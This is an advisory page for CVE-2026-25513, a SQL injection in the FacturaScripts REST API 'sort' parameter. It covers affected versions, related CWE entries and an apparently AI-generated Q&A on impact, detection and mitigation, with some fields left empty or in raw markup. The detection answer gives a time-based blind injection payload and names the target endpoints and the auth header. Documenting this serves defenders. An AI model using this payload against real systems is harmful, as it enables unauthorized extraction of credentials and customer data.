CVE-2026-25513
Critical SQL Injection in FacturaScripts REST API Sorting Parameter
Publication date: 2026-02-04
Last updated on: 2026-02-23
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| facturascripts | facturascripts | to 2025.81 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
| CWE-20 | The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. |
| CWE-943 | The product generates a query intended to access or manipulate data in a data store such as a database, but it does not neutralize or incorrectly neutralizes special elements that can modify the intended logic of the query. |
| CWE-1286 | The product receives input that is expected to be well-formed - i.e., to comply with a certain syntax - but it does not validate or incorrectly validates that the input complies with the syntax. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-25513 is a critical SQL injection vulnerability in the FacturaScripts REST API that affects all versions prior to 2025.81. The flaw exists in the handling of the `sort` parameter used for ordering query results in API endpoints. Specifically, the vulnerability is in the `ModelClass::getOrderBy()` and `DbQuery::orderBy()` methods, where user-supplied sorting parameters are directly concatenated into the SQL ORDER BY clause without proper validation or sanitization.
This allows authenticated API users to inject arbitrary SQL code through the sort parameter, enabling them to execute unauthorized SQL queries on the database.
The vulnerability requires a valid API authentication token and access to the FacturaScripts API endpoints. Exploitation can be done by injecting SQL payloads in the sort parameter, such as time-based blind SQL injection to confirm and extract sensitive data.
How can this vulnerability impact me? :
This vulnerability can have severe impacts including complete database disclosure via blind SQL injection. An attacker with valid API credentials can extract sensitive data such as user credentials, API keys, customer personally identifiable information (PII), financial records, business intelligence, and system secrets.
The impact affects organizations using FacturaScripts API for integrations, mobile apps, third-party integrations relying on the API, all users whose data is accessible via the API, and business partners with API access.
The vulnerability has a high severity rating with a CVSS score of 8.3, indicating a high confidentiality impact with potential for full data compromise.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by testing the FacturaScripts REST API endpoints that support sorting functionality, such as `/api/3/users` or `/api/3/customers`, for SQL injection via the `sort` parameter.
A common detection method involves sending authenticated API requests with specially crafted `sort` parameters that include SQL payloads to observe abnormal behavior such as time delays.
For example, a time-based blind SQL injection test can be performed by injecting a payload like `sort[nick,(SELECT(SLEEP(3)))] = ASC` and measuring if the response is delayed by approximately 3 seconds, indicating vulnerability.
To perform this test, you need a valid API authentication token (`X-Auth-Token` header) obtained by logging into the web interface and handling CSRF tokens and session cookies.
Automated scripts, such as Python scripts, can be used to log in, retrieve API keys, and perform time-based blind SQL injection tests by sending requests with crafted `sort` parameters and measuring response times.
What immediate steps should I take to mitigate this vulnerability?
[{'type': 'paragraph', 'content': 'Immediate mitigation steps include applying strict validation and sanitization to the `sort` parameter used in API requests to prevent SQL injection.'}, {'type': 'list_item', 'content': 'Validate column names against a whitelist of valid model fields.'}, {'type': 'list_item', 'content': "Restrict sort directions strictly to 'ASC' or 'DESC', normalizing input and defaulting invalid values to 'ASC'."}, {'type': 'list_item', 'content': 'Escape column names properly before concatenation to the SQL query.'}, {'type': 'list_item', 'content': 'Implement special handling for fields with parentheses by allowing only specific SQL functions such as LOWER(), UPPER(), and CAST() with valid syntax.'}, {'type': 'list_item', 'content': 'Use prepared statements or query builder patterns that safely apply sorting parameters instead of direct string concatenation.'}, {'type': 'paragraph', 'content': 'Updating FacturaScripts to version 2025.81 or later, where these fixes have been implemented, is strongly recommended.'}] [1, 2]